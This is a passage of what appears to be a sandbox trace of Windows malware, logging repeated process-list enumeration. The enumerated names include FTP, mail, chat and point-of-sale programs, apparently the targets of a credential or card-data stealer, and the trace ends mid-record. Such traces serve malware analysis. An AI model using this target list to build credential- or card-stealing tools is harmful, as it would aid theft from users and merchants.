[0217.563] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0217.565] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0217.566] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0217.568] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0217.569] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0217.571] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0217.573] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0217.574] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0217.640] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0217.643] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0217.646] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0217.649] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0217.652] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0217.654] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0217.658] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0217.661] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0217.663] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0217.666] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0217.669] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0217.671] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0217.674] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0217.717] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0217.720] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0217.723] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0217.726] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0217.729] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0217.732] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0217.735] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0217.737] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0217.740] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0217.742] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0217.745] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0217.748] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0217.750] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0217.757] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0217.760] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0217.762] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0217.765] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0217.767] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0217.769] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0217.771] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0217.773] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0217.774] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0217.776] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0217.778] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0217.780] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0217.781] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0217.783] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0217.785] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0217.787] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0217.789] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0217.793] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0217.795] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0217.797] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0217.799] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0217.800] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0217.802] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0217.804] CloseHandle (hObject=0x2194) returned 1 [0217.804] Sleep (dwMilliseconds=0x64) [0217.951] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2194 [0217.964] Process32First (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.966] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0217.969] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0217.971] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.973] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0217.975] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.977] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0217.980] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0217.982] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0217.983] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.985] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.086] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0218.097] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.100] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.102] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.104] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.105] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.107] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.109] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.111] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0218.114] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0218.116] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.117] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0218.119] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.121] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0218.123] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0218.125] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0218.127] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, 